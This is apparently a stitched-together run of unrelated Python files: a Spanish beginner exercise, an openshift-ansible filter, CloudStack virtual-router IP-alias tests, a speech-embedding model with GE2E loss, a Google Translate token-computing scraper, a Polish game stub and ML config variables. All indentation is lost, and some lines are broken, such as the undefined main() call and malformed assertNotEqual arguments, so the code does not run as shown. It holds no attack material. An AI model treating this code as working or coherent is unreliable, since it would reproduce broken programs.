###Si A/B<=30, calcular e imprimir el valor de (A^2+B^2)
a = int(input('Primer valor: '))
b = int(input('Segundo valor: '))
n = 10
suma = 0
sumas = 0
if a >= b:
while n <= 50:
suma += n
n += 4
print (suma)
if a/b <= 30:
sumas = (a**2+b**2)
print (sumas)
if __name__ == '__main__':
main() |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# pylint: disable=too-many-lines
"""
Custom filters for use in openshift-ansible
"""
from ansible import errors
def odc_join_files_from_dict(files, inc_dict):
'''Take a list of dictionaries with name, path and insert them into
inc_dict[name] = path
'''
if not isinstance(files, list):
raise errors.AnsibleFilterError("|failed expects files param to be a list of dicts")
if not isinstance(inc_dict, dict):
raise errors.AnsibleFilterError("|failed expects inc_dict param to be a dict")
for item in files:
inc_dict[item['name']] = item['path']
return inc_dict
class FilterModule(object):
""" Custom ansible filter mapping """
# pylint: disable=no-self-use, too-few-public-methods
def filters(self):
""" returns a mapping of filters to methods """
return {
"odc_join_files_from_dict": odc_join_files_from_dict,
}
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Tests for Multiple IP Ranges feature
"""
from marvin.cloudstackTestCase import cloudstackTestCase, unittest
from marvin.lib.utils import cleanup_resources, get_process_status
from marvin.lib.base import (Account,
DiskOffering,
VirtualMachine,
Router,
ServiceOffering,
PublicIpRange)
from marvin.lib.common import (get_domain,
get_zone,
list_routers,
list_hosts,
get_pod,
get_template)
import netaddr
from nose.plugins.attrib import attr
from netaddr import IPNetwork, IPAddress
from marvin.sshClient import SshClient
import random
class TestMultipleIpRanges(cloudstackTestCase):
"""Test Multiple IP Ranges for guest network
"""
@classmethod
def setUpClass(cls):
cls.testClient = super(TestMultipleIpRanges, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.dbclient = cls.testClient.getDbConnection()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.pod = get_pod(cls.api_client, cls.zone.id)
cls.testdata['mode'] = cls.zone.networktype
cls.testdata["domainid"] = cls.domain.id
cls.testdata["zoneid"] = cls.zone.id
cls.account = Account.create(
cls.api_client,
cls.testdata["account"],
domainid=cls.domain.id
)
cls.testdata["account"] = cls.account.name
cls.disk_offering = DiskOffering.create(
cls.api_client,
cls.testdata["disk_offering"]
)
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["diskoffering"] = cls.disk_offering.id
cls.dc_id = cls.dbclient.execute(
"select id from data_center where uuid = '%s';" % str(
cls.testdata["zoneid"]))
cls.dc_id = cls.dc_id[0][0]
cls.ids = cls.dbclient.execute(
"select id from user_ip_address where allocated is null and data_center_id = '%s';" % str(
cls.dc_id))
cls.id_list = []
for i in range(len(cls.ids)):
cls.id_list.append(cls.ids[i][0])
# Check if VR is already present in the setup
vr_list = Router.list(cls.api_client, listall='true')
cls.debug("vr list {}".format(vr_list))
if isinstance(vr_list, list) and len(vr_list) > 0:
cls.debug("VR is running in the setup")
cls.vr_state = True
else:
cls.debug("VR is not present in the setup")
cls.vr_state = False
cls.id_list = cls.id_list[:-2]
for id in cls.id_list:
cls.dbclient.execute(
"update user_ip_address set allocated=now() where id = '%s';" %
str(id))
# create new vlan ip range
# Before creating ip range check the zone's network type
if cls.zone.networktype.lower() == 'basic':
cls.new_vlan = cls.createNewVlanRange()
else:
raise unittest.SkipTest(
"These tests can be run only on basic zone.\
So skipping the tests")
# Deploy vm in existing subnet if VR is not present
if cls.vr_state is False:
cls.vm_res = VirtualMachine.create(
cls.api_client,
cls.testdata["server_without_disk"],
templateid=cls.template.id,
accountid=cls.account.name,
domainid=cls.testdata["domainid"],
zoneid=cls.testdata["zoneid"],
serviceofferingid=cls.service_offering.id,
mode=cls.testdata["mode"],
)
cls._cleanup = [
cls.new_vlan,
cls.account,
]
return
@classmethod
def createNewVlanRange(cls):
""" Increment current cidr of vlan range present in network
and create new range
"""
publicIpRange = PublicIpRange.list(cls.api_client)
cls.startIp = publicIpRange[0].startip
cls.endIp = publicIpRange[0].endip
cls.gateway = publicIpRange[0].gateway
cls.netmask = publicIpRange[0].netmask
# Pass ip address and mask length to IPNetwork to findout the CIDR
ip = IPNetwork(cls.startIp + "/" + cls.netmask)
# Take random increment factor to avoid adding the same vlan ip range
# in each test case
networkIncrementFactor = random.randint(1,255)
new_cidr = ip.__iadd__(networkIncrementFactor)
ip2 = IPNetwork(new_cidr)
test_nw = ip2.network
ip = IPAddress(test_nw)
# Add IP range(5 IPs) in the new CIDR
test_gateway = ip.__add__(1)
test_startIp = ip.__add__(3)
test_endIp = ip.__add__(10)
# Populating services with new IP range
cls.testdata["vlan_ip_range"]["startip"] = test_startIp
cls.testdata["vlan_ip_range"]["endip"] = test_endIp
cls.testdata["vlan_ip_range"]["gateway"] = test_gateway
cls.testdata["vlan_ip_range"]["netmask"] = cls.netmask
cls.testdata["vlan_ip_range"]["zoneid"] = cls.zone.id
cls.testdata["vlan_ip_range"]["podid"] = cls.pod.id
return PublicIpRange.create(
cls.api_client,
cls.testdata["vlan_ip_range"])
@classmethod
def tearDownClass(cls):
try:
for id in cls.id_list:
cls.dbclient.execute(
"update user_ip_address set allocated=default where id = '%s';" %
str(id))
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
# Deploy guest vm
try:
self.virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["server_without_disk"],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.testdata["domainid"],
zoneid=self.testdata["zoneid"],
serviceofferingid=self.service_offering.id,
mode=self.testdata["mode"],
)
except Exception as e:
raise Exception(
"Warning: Exception during vm deployment: {}".format(e))
self.vm_response = VirtualMachine.list(
self.apiclient,
id=self.virtual_machine.id
)
self.assertEqual(
isinstance(self.vm_response, list),
True,
"Check VM list response returned a valid list"
)
self.ip_range = list(
netaddr.iter_iprange(
unicode(
self.testdata["vlan_ip_range"]["startip"]), unicode(
self.testdata["vlan_ip_range"]["endip"])))
self.nic_ip = netaddr.IPAddress(
unicode(
self.vm_response[0].nic[0].ipaddress))
self.debug("vm got {} as ip address".format(self.nic_ip))
self.assertIn(
self.nic_ip,
self.ip_range,
"VM did not get the ip address from the new ip range"
)
ip_alias = self.dbclient.execute(
"select ip4_address from nic_ip_alias;"
)
self.alias_ip = str(ip_alias[0][0])
self.debug("alias ip : %s" % self.alias_ip)
self.assertNotEqual(
self.alias_ip,
None,
"Error in creating ip alias. Please check MS logs"
)
self.cleanup.append(self.virtual_machine)
return
def tearDown(self):
try:
# Clean up, terminate the resources created
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def verify_vlan_range(self, vlan, services):
# compare vlan_list response with configured values
self.assertEqual(
isinstance(vlan, list),
True,
"Check list response returned a valid list"
)
self.assertNotEqual(
len(vlan),
0,
"check list vlan response"
)
self.assertEqual(
str(vlan[0].startip),
str(services["startip"]),
"Start IP in vlan ip range is not matched with the\
configured start ip"
)
self.assertEqual(
str(vlan[0].endip),
str(services["endip"]),
"End IP in vlan ip range is not matched with the configured end ip"
)
self.assertEqual(
str(vlan[0].gateway),
str(services["gateway"]),
"gateway in vlan ip range is not matched with the\
configured gateway"
)
self.assertEqual(
str(vlan[0].netmask),
str(services["netmask"]),
"netmask in vlan ip range is not matched with\
the configured netmask"
)
return
@attr(tags=["sg"])
def test_01_deploy_vm_in_new_cidr(self):
"""Deploy guest vm after adding guest IP range in new CIDR
1.Deploy guest vm
2.Verify vm gets the ip address from new cidr
"""
self.ip_range = list(
netaddr.iter_iprange(
unicode(
self.testdata["vlan_ip_range"]["startip"]), unicode(
self.testdata["vlan_ip_range"]["endip"])))
self.nic_ip = netaddr.IPAddress(
unicode(
self.vm_response[0].nic[0].ipaddress))
self.debug("vm got {} as ip address".format(self.nic_ip))
self.assertIn(
self.nic_ip,
self.ip_range,
"VM did not get the ip address from the new ip range"
)
return
@attr(tags=["sg"])
def test_02_dns_service_on_alias_ip(self):
"""Deploy guest vm in new CIDR and verify dns service on alias ip
1.Deploy guest vm in new cidr
2.Verify dns service listens on alias ip in VR
"""
list_router_response = list_routers(
self.apiclient,
zoneid=self.zone.id,
listall=True
)
self.assertEqual(
isinstance(list_router_response, list),
True,
"Check list response returns a valid list"
)
router = list_router_response[0]
hosts = list_hosts(
self.apiclient,
zoneid=router.zoneid,
type='Routing',
state='Up',
id=router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"Check list host returns a valid list"
)
host = hosts[0]
self.debug("Router ID: %s, state: %s" % (router.id, router.state))
self.assertEqual(
router.state,
'Running',
"Check list router response for router state"
)
port = self.testdata['configurableData']['host']["publicport"]
username = self.testdata['configurableData']['host']["username"]
password = self.testdata['configurableData']['host']["password"]
# SSH to host so that host key is saved in first
# attempt
SshClient(host.ipaddress, port, username, password)
proc = self.alias_ip + ":53"
result = get_process_status(
host.ipaddress,
port,
username,
password,
router.linklocalip,
"netstat -atnp | grep %s" % proc
)
res = str(result)
self.debug("Dns process status on alias ip: %s" % res)
self.assertNotEqual(
res.find(proc)
- 1,
"dnsmasq service is not running on alias ip"
)
return
@attr(tags=["sg"])
def test_03_passwd_service_on_alias_IP(self):
"""Deploy guest vm in new CIDR and verify passwd service on alias ip
1.Deploy guest vm in new cidr
2.Verify password service(socat) listens on alias ip in VR
"""
list_router_response = list_routers(
self.apiclient,
zoneid=self.zone.id,
listall=True
)
self.assertEqual(
isinstance(list_router_response, list),
True,
"Check list response returns a valid list"
)
router = list_router_response[0]
hosts = list_hosts(
self.apiclient,
zoneid=router.zoneid,
type='Routing',
state='Up',
id=router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"Check list host returns a valid list"
)
host = hosts[0]
self.debug("Router ID: %s, state: %s" % (router.id, router.state))
self.assertEqual(
router.state,
'Running',
"Check list router response for router state"
)
port = self.testdata['configurableData']['host']["publicport"]
username = self.testdata['configurableData']['host']["username"]
password = self.testdata['configurableData']['host']["password"]
# SSH to host so that host key is saved in first
# attempt
SshClient(host.ipaddress, port, username, password)
proc = "socat"
result = get_process_status(
host.ipaddress,
port,
username,
password,
router.linklocalip,
"netstat -atnp | grep %s" % proc
)
res = str(result)
self.debug("password process status on VR: %s" % res)
self.assertNotEqual(
res.find(self.alias_ip)
- 1,
"password service is not running on alias ip"
)
return
@attr(tags=["sg"])
def test_04_userdata_service_on_alias_IP(self):
"""Deploy guest vm in new CIDR and verify userdata service on alias ip
1.Deploy guest vm in new cidr
2.Verify userdata service(apache2) listens on alias ip in VR
"""
list_router_response = list_routers(
self.apiclient,
zoneid=self.zone.id,
listall=True
)
self.assertEqual(
isinstance(list_router_response, list),
True,
"Check list response returns a valid list"
)
router = list_router_response[0]
hosts = list_hosts(
self.apiclient,
zoneid=router.zoneid,
type='Routing',
state='Up',
id=router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"Check list host returns a valid list"
)
host = hosts[0]
self.debug("Router ID: %s, state: %s" % (router.id, router.state))
self.assertEqual(
router.state,
'Running',
"Check list router response for router state"
)
port = self.testdata['configurableData']['host']["publicport"]
username = self.testdata['configurableData']['host']["username"]
password = self.testdata['configurableData']['host']["password"]
# SSH to host so that host key is saved in first
# attempt
SshClient(host.ipaddress, port, username, password)
proc = "apache2"
result = get_process_status(
host.ipaddress,
port,
username,
password,
router.linklocalip,
"netstat -atnp | grep %s" % proc
)
res = str(result)
self.debug("userdata process status on VR: %s" % res)
self.assertNotEqual(
res.find(self.alias_ip + ":80 ")
- 1,
"password service is not running on alias ip"
)
return
@attr(tags=["sg"])
def test_05_del_cidr_verify_alias_removal(self):
"""Destroy lastvm in the CIDR and verifly alias removal
1.Deploy guest vm in new cidr
2.Verify ip alias creation
3.Destroy vm and wait for it to expunge
4.Verify ip alias removal after vm expunge
"""
list_router_response = list_routers(
self.apiclient,
zoneid=self.zone.id,
listall=True
)
self.assertEqual(
isinstance(list_router_response, list),
True,
"Check list response returns a valid list"
)
router = list_router_response[0]
hosts = list_hosts(
self.apiclient,
zoneid=router.zoneid,
type='Routing',
state='Up',
id=router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"Check list host returns a valid list"
)
host = hosts[0]
self.debug("Router ID: %s, state: %s" % (router.id, router.state))
self.assertEqual(
router.state,
'Running',
"Check list router response for router state"
)
port = self.testdata['configurableData']['host']["publicport"]
username = self.testdata['configurableData']['host']["username"]
password = self.testdata['configurableData']['host']["password"]
# SSH to host so that host key is saved in first
# attempt
SshClient(host.ipaddress, port, username, password)
proc = "ip addr show eth0"
result = get_process_status(
host.ipaddress,
port,
username,
password,
router.linklocalip,
proc
)
res = str(result)
self.debug("ip alias configuration on VR: %s" % res)
self.assertNotEqual(
res.find(self.alias_ip)
- 1,
"ip alias is not created on VR eth0"
)
self.virtual_machine.delete(self.apiclient)
self.debug(
"Verify that expunging the last vm in the CIDR should\
delete the ip alias from VR")
ip_alias2 = self.dbclient.execute(
"select ip4_address from nic_ip_alias;"
)
self.assertEqual(
isinstance(ip_alias2, list),
True,
"Error in sql query"
)
self.assertEqual(
len(ip_alias2),
0,
"Failure in clearing ip alias entry from cloud db"
)
proc = "ip addr show eth0"
result = get_process_status(
host.ipaddress,
port,
username,
password,
router.linklocalip,
proc
)
res = str(result)
self.assertEqual(
res.find(
self.alias_ip),
- 1,
"Failed to clean up ip alias from VR even after\
last vm expunge in the CIDR")
self.debug("IP alias got deleted from VR successfully.")
self.cleanup.remove(self.virtual_machine)
return
@attr(tags=["sg"])
def test_06_reboot_VR_verify_ip_alias(self):
"""Reboot VR and verify ip alias
1.Deploy guest vm in new cidr
2.Verify ip alias creation
3.Reboot VR
4.Verify ip alias on VR
"""
list_router_response = list_routers(
self.apiclient,
zoneid=self.zone.id,
listall=True
)
self.assertEqual(
isinstance(list_router_response, list),
True,
"Check list response returns a valid list"
)
router = list_router_response[0]
hosts = list_hosts(
self.apiclient,
zoneid=router.zoneid,
type='Routing',
state='Up',
id=router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"Check list host returns a valid list"
)
host = hosts[0]
self.debug("Router ID: %s, state: %s" % (router.id, router.state))
self.assertEqual(
router.state,
'Running',
"Check list router response for router state"
)
port = self.testdata['configurableData']['host']["publicport"]
username = self.testdata['configurableData']['host']["username"]
password = self.testdata['configurableData']['host']["password"]
# SSH to host so that host key is saved in first
# attempt
SshClient(host.ipaddress, port, username, password)
proc = "ip addr show eth0"
result = get_process_status(
host.ipaddress,
port,
username,
password,
router.linklocalip,
proc
)
res = str(result)
self.debug("ip alias configuration on VR: %s" % res)
self.assertNotEqual(
res.find(self.alias_ip)
- 1,
"ip alias is not created on VR eth0"
)
resp = Router.reboot(
self.apiclient,
router.id
)
self.debug("Reboot router api response: %s" % resp)
list_router_response = list_routers(
self.apiclient,
zoneid=self.zone.id,
listall=True
)
self.assertEqual(
isinstance(list_router_response, list),
True,
"Check list response returns a valid list"
)
router = list_router_response[0]
self.assertEqual(
router.state,
'Running',
"Router is not in running state after reboot"
)
result = get_process_status(
host.ipaddress,
port,
username,
password,
router.linklocalip,
proc
)
res = str(result)
self.assertNotEqual(
res.find(self.alias_ip),
- 1,
"IP alias not present on VR after VR reboot"
)
return
@attr(tags=["sg"])
def test_07_stop_start_VR_verify_ip_alias(self):
"""Reboot VR and verify ip alias
1.Deploy guest vm in new cidr
2.Verify ip alias creation
3.Stop and Start VR
4.Verify ip alias on VR
"""
list_router_response = list_routers(
self.apiclient,
zoneid=self.zone.id,
listall=True
)
self.assertEqual(
isinstance(list_router_response, list),
True,
"Check list response returns a valid list"
)
router = list_router_response[0]
hosts = list_hosts(
self.apiclient,
zoneid=router.zoneid,
type='Routing',
state='Up',
id=router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"Check list host returns a valid list"
)
host = hosts[0]
self.debug("Router ID: %s, state: %s" % (router.id, router.state))
self.assertEqual(
router.state,
'Running',
"Check list router response for router state"
)
port = self.testdata['configurableData']['host']["publicport"]
username = self.testdata['configurableData']['host']["username"]
password = self.testdata['configurableData']['host']["password"]
# SSH to host so that host key is saved in first
# attempt
SshClient(host.ipaddress, port, username, password)
proc = "ip addr show eth0"
result = get_process_status(
host.ipaddress,
port,
username,
password,
router.linklocalip,
proc
)
res = str(result)
self.debug("ip alias configuration on VR: %s" % res)
self.assertNotEqual(
res.find(self.alias_ip)
- 1,
"ip alias is not created on VR eth0"
)
self.debug("Stopping VR")
Router.stop(
self.apiclient,
router.id,
)
self.debug("Starting VR")
Router.start(
self.apiclient,
router.id
)
list_router_response = list_routers(
self.apiclient,
zoneid=self.zone.id,
listall=True
)
self.assertEqual(
isinstance(list_router_response, list),
True,
"Check list response returns a valid list"
)
router = list_router_response[0]
self.assertEqual(
router.state,
'Running',
"Router is not in running state after reboot"
)
self.debug("VR is up and Running")
result = get_process_status(
host.ipaddress,
port,
username,
password,
router.linklocalip,
proc
)
res = str(result)
self.assertNotEqual(
res.find(self.alias_ip),
- 1,
"IP alias not present on VR after VR stop and start"
)
return
|
# -*- coding: utf-8 -*- #
"""*********************************************************************************************"""
# FileName [ model.py ]
# Synopsis [ the linear model ]
# Author [ S3PRL ]
# Copyright [ Copyleft(c), Speech Lab, NTU, Taiwan ]
"""*********************************************************************************************"""
###############
# IMPORTATION #
###############
import torch
import torch.nn as nn
import torch.nn.functional as F
from functools import lru_cache
from argparse import Namespace
from s3prl.upstream.mockingjay.model import TransformerEncoder
#########
# MODEL #
#########
class Identity(nn.Module):
def __init__(self, config, **kwargs):
super(Identity, self).__init__()
# simply pass pretrained vector
def forward(self, feature, att_mask, head_mask, **kwargs):
return [feature]
class Mean(nn.Module):
def __init__(self, out_dim):
super(Mean, self).__init__()
self.act_fn = nn.Tanh()
self.linear = nn.Linear(out_dim, out_dim)
# simply take mean operator / no additional parameters
def forward(self, feature, att_mask):
'''
we use 1 hidden layer and applied mean pooling in the end to generate utterance-level representation
Arguments
feature - [BxTxD] Acoustic feature with shape
att_mask - [BxTx1] Attention Mask logits
'''
feature=self.linear(self.act_fn(feature))
agg_vec_list = []
for i in range(len(feature)):
if torch.nonzero(att_mask[i] < 0, as_tuple=False).size(0) == 0:
length = len(feature[i])
else:
length = torch.nonzero(att_mask[i] < 0, as_tuple=False)[0] + 1
agg_vec=torch.mean(feature[i][:length], dim=0)
agg_vec_list.append(agg_vec)
return torch.stack(agg_vec_list)
class SAP(nn.Module):
''' Self Attention Pooling module incoporate attention mask'''
def __init__(self, out_dim):
super(SAP, self).__init__()
# Setup
self.act_fn = nn.Tanh()
self.sap_layer = SelfAttentionPooling(out_dim)
def forward(self, feature, att_mask):
'''
Arguments
feature - [BxTxD] Acoustic feature with shape
att_mask - [BxTx1] Attention Mask logits
'''
#Encode
feature = self.act_fn(feature)
sap_vec = self.sap_layer(feature, att_mask)
return sap_vec
class SelfAttentionPooling(nn.Module):
"""
Implementation of SelfAttentionPooling
Original Paper: Self-Attention Encoding and Pooling for Speaker Recognition
https://arxiv.org/pdf/2008.01077v1.pdf
"""
def __init__(self, input_dim):
super(SelfAttentionPooling, self).__init__()
self.W = nn.Linear(input_dim, 1)
self.softmax = nn.functional.softmax
def forward(self, batch_rep, att_mask):
"""
input:
batch_rep : size (N, T, H), N: batch size, T: sequence length, H: Hidden dimension
attention_weight:
att_w : size (N, T, 1)
return:
utter_rep: size (N, H)
"""
seq_len = batch_rep.shape[1]
att_logits = self.W(batch_rep).squeeze(-1)
att_logits = att_mask + att_logits
att_w = self.softmax(att_logits, dim=-1).unsqueeze(-1)
utter_rep = torch.sum(batch_rep * att_w, dim=1)
return utter_rep
class Model(nn.Module):
def __init__(self, input_dim, agg_module, config):
super(Model, self).__init__()
# agg_module: current support [ "SAP", "Mean" ]
# init attributes
self.agg_method = eval(agg_module)(input_dim)
self.model= eval(config['module'])(config=Namespace(**config['hparams']),)
self.head_mask = [None] * config['hparams']['num_hidden_layers']
def forward(self, features, att_mask):
features = self.model(features,att_mask[:,None,None], head_mask=self.head_mask, output_all_encoded_layers=False)
utterance_vector = self.agg_method(features[0], att_mask)
return utterance_vector
class GE2E(nn.Module):
"""Implementation of the GE2E loss in https://arxiv.org/abs/1710.10467 [1]
Accepts an input of size (N, M, D)
where N is the number of speakers in the batch,
M is the number of utterances per speaker,
and D is the dimensionality of the embedding vector (e.g. d-vector)
Args:
- init_w (float): the initial value of w in Equation (5) of [1]
- init_b (float): the initial value of b in Equation (5) of [1]
"""
def __init__(self, init_w=10.0, init_b=-5.0, loss_method='softmax'):
super(GE2E, self).__init__()
self.w = nn.Parameter(torch.tensor(init_w))
self.b = nn.Parameter(torch.tensor(init_b))
self.loss_method = loss_method
assert self.loss_method in ['softmax', 'contrast']
if self.loss_method == 'softmax':
self.embed_loss = self.embed_loss_softmax
if self.loss_method == 'contrast':
self.embed_loss = self.embed_loss_contrast
def cosine_similarity(self, dvecs):
"""Calculate cosine similarity matrix of shape (N, M, N)."""
n_spkr, n_uttr, d_embd = dvecs.size()
dvec_expns = dvecs.unsqueeze(-1).expand(n_spkr, n_uttr, d_embd, n_spkr)
dvec_expns = dvec_expns.transpose(2, 3)
ctrds = dvecs.mean(dim=1).to(dvecs.device)
ctrd_expns = ctrds.unsqueeze(0).expand(n_spkr * n_uttr, n_spkr, d_embd)
ctrd_expns = ctrd_expns.reshape(-1, d_embd)
dvec_rolls = torch.cat([dvecs[:, 1:, :], dvecs[:, :-1, :]], dim=1)
dvec_excls = dvec_rolls.unfold(1, n_uttr-1, 1)
mean_excls = dvec_excls.mean(dim=-1).reshape(-1, d_embd)
indices = _indices_to_replace(n_spkr, n_uttr).to(dvecs.device)
ctrd_excls = ctrd_expns.index_copy(0, indices, mean_excls)
ctrd_excls = ctrd_excls.view_as(dvec_expns)
return F.cosine_similarity(dvec_expns, ctrd_excls, 3, 1e-9)
def embed_loss_softmax(self, dvecs, cos_sim_matrix):
"""Calculate the loss on each embedding by taking softmax."""
n_spkr, n_uttr, _ = dvecs.size()
indices = _indices_to_replace(n_spkr, n_uttr).to(dvecs.device)
losses = -F.log_softmax(cos_sim_matrix, 2)
return losses.flatten().index_select(0, indices).view(n_spkr, n_uttr)
def embed_loss_contrast(self, dvecs, cos_sim_matrix):
"""Calculate the loss on each embedding by contrast loss."""
N, M, _ = dvecs.shape
L = []
for j in range(N):
L_row = []
for i in range(M):
centroids_sigmoids = torch.sigmoid(cos_sim_matrix[j, i])
excl_centroids_sigmoids = torch.cat(
(centroids_sigmoids[:j], centroids_sigmoids[j+1:]))
L_row.append(1. - torch.sigmoid(cos_sim_matrix[j, i, j]) +
torch.max(excl_centroids_sigmoids))
L_row = torch.stack(L_row)
L.append(L_row)
return torch.stack(L)
def forward(self, dvecs):
"""Calculate the GE2E loss for an input of dimensions (N, M, D)."""
cos_sim_matrix = self.cosine_similarity(dvecs)
torch.clamp(self.w, 1e-9)
cos_sim_matrix = cos_sim_matrix * self.w + self.b
L = self.embed_loss(dvecs, cos_sim_matrix)
return L.sum()
@lru_cache(maxsize=5)
def _indices_to_replace(n_spkr, n_uttr):
indices = [(s * n_uttr + u) * n_spkr + s
for s in range(n_spkr) for u in range(n_uttr)]
return torch.LongTensor(indices)
|
import requests
import json
#from bs4 import BeautifulSoup
import execjs #必须,需要先用pip 安装,用来执行js脚本
class Py4Js():
def __init__(self):
self.ctx = execjs.compile("""
function TL(a) {
var k = "";
var b = 406644;
var b1 = 3293161072;
var jd = ".";
var $b = "+-a^+6";
var Zb = "+-3^+b+-f";
for (var e = [], f = 0, g = 0; g < a.length; g++) {
var m = a.charCodeAt(g);
128 > m ? e[f++] = m : (2048 > m ? e[f++] = m >> 6 | 192 : (55296 == (m & 64512) && g + 1 < a.length && 56320 == (a.charCodeAt(g + 1) & 64512) ? (m = 65536 + ((m & 1023) << 10) + (a.charCodeAt(++g) & 1023),
e[f++] = m >> 18 | 240,
e[f++] = m >> 12 & 63 | 128) : e[f++] = m >> 12 | 224,
e[f++] = m >> 6 & 63 | 128),
e[f++] = m & 63 | 128)
}
a = b;
for (f = 0; f < e.length; f++) a += e[f],
a = RL(a, $b);
a = RL(a, Zb);
a ^= b1 || 0;
0 > a && (a = (a & 2147483647) + 2147483648);
a %= 1E6;
return a.toString() + jd + (a ^ b)
};
function RL(a, b) {
var t = "a";
var Yb = "+";
for (var c = 0; c < b.length - 2; c += 3) {
var d = b.charAt(c + 2),
d = d >= t ? d.charCodeAt(0) - 87 : Number(d),
d = b.charAt(c + 1) == Yb ? a >>> d: a << d;
a = b.charAt(c) == Yb ? a + d & 4294967295 : a ^ d
}
return a
}
""")
def getTk(self,text):
return self.ctx.call("TL",text)
#英转中
def buildUrl_e2c(text,tk):
baseUrl='https://translate.google.cn/translate_a/single'
baseUrl+='?client=webapp&'
baseUrl+='sl=en&'
baseUrl+='tl=zh-CN&'
baseUrl+='hl=en&'
baseUrl+='dt=at&'
baseUrl+='dt=bd&'
baseUrl+='dt=ex&'
baseUrl+='dt=ld&'
baseUrl+='dt=md&'
baseUrl+='dt=qca&'
baseUrl+='dt=rw&'
baseUrl+='dt=rm&'
baseUrl+='dt=ss&'
baseUrl+='dt=t&'
baseUrl+='ie=UTF-8&'
baseUrl+='oe=UTF-8&'
baseUrl+='otf=1&'
baseUrl+='pc=1&'
baseUrl+='ssel=0&'
baseUrl+='tsel=0&'
baseUrl+='kc=2&'
baseUrl+='tk='+str(tk)+'&'
baseUrl+='q='+text
return baseUrl
#中转英
def buildUrl_c2e(text,tk):
baseUrl='https://translate.google.cn/translate_a/single'
baseUrl+='?client=webapp&'
baseUrl+='sl=zh-CN&'
baseUrl+='tl=en&'
baseUrl+='hl=zh-CN&'
baseUrl+='dt=at&'
baseUrl+='dt=bd&'
baseUrl+='dt=ex&'
baseUrl+='dt=ld&'
baseUrl+='dt=md&'
baseUrl+='dt=qca&'
baseUrl+='dt=rw&'
baseUrl+='dt=rm&'
baseUrl+='dt=ss&'
baseUrl+='dt=t&'
baseUrl+='ie=UTF-8&'
baseUrl+='oe=UTF-8&'
baseUrl+='otf=1&'
baseUrl+='pc=1&'
baseUrl+='ssel=0&'
baseUrl+='tsel=0&'
baseUrl+='kc=2&'
baseUrl+='tk='+str(tk)+'&'
baseUrl+='q='+text
return baseUrl
def translate(js, text, type):
header={
'authority':'translate.google.cn',
'method':'GET',
'path':'',
'scheme':'https',
'accept':'*/*',
'accept-encoding':'gzip, deflate, br',
'accept-language':'zh-CN,zh;q=0.9',
'cookie':'',
'user-agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'x-client-data':'CIa2yQEIpbbJAQjBtskBCPqcygEIqZ3KAQioo8oBGJGjygE='
}
if type == 'e2c' :
url = buildUrl_e2c(text,js.getTk(text))
elif type == 'c2e' :
url = buildUrl_c2e(text, js.getTk(text))
res=''
try:
r=requests.get(url)
result=json.loads(r.text)
if result[7]!=None and len(result[7])!=0:
# 如果我们文本输错,提示你是不是要找xxx的话,那么重新把xxx正确的翻译之后返回
try:
correctText=result[7][0].replace('<b><i>',' ').replace('</i></b>','')
print(correctText)
if type == 'e2c' :
correctUrl = buildUrl_e2c(correctText,js.getTk(correctText))
elif type == 'c2e' :
correctUrl = buildUrl_c2e(correctText, js.getTk(correctText))
correctR=requests.get(correctUrl)
newResult=json.loads(correctR.text)
res=newResult[0][0][0]
except Exception as e:
print(e)
#res=result[0][0][0]
res=''
else:
res=result[0][0][0]
except Exception as e:
res=''
print(url)
print("翻译"+text+"失败")
print("错误信息:")
print(e)
finally:
return res
if __name__ == '__main__':
js=Py4Js()
res=translate(js, '你好啊', 'c2e')
print("中文转英文:", res)
res=translate(js, 'hello', 'e2c')
print("英文转中文:", res)
|
#komentarze (TBD)
player_choice = "p"
print("Ty wybrałeś", player_choice)
print("Ja wybrałem", "n")
print("Wygrałem, yay! :P")
|
#!/usr/bin/env python3
import os
import numpy as np
## Processing in batches:
#
BATCH_SIZE = int(os.getenv('CK_BATCH_SIZE', 1))
## Model properties:
#
MODEL_IMAGE_HEIGHT = int(os.getenv('ML_MODEL_IMAGE_HEIGHT',
os.getenv('CK_ENV_ONNX_MODEL_IMAGE_HEIGHT',
os.getenv('CK_ENV_TENSORFLOW_MODEL_IMAGE_HEIGHT',
''))))
MODEL_IMAGE_WIDTH = int(os.getenv('ML_MODEL_IMAGE_WIDTH',
os.getenv('CK_ENV_ONNX_MODEL_IMAGE_WIDTH',
os.getenv('CK_ENV_TENSORFLOW_MODEL_IMAGE_WIDTH',
''))))
MODEL_IMAGE_CHANNELS = int(os.getenv('ML_MODEL_IMAGE_CHANNELS', 3))
MODEL_DATA_LAYOUT = os.getenv('ML_MODEL_DATA_LAYOUT', 'NCHW')
MODEL_COLOURS_BGR = os.getenv('ML_MODEL_COLOUR_CHANNELS_BGR', 'NO') in ('YES', 'yes', 'ON', 'on', '1')
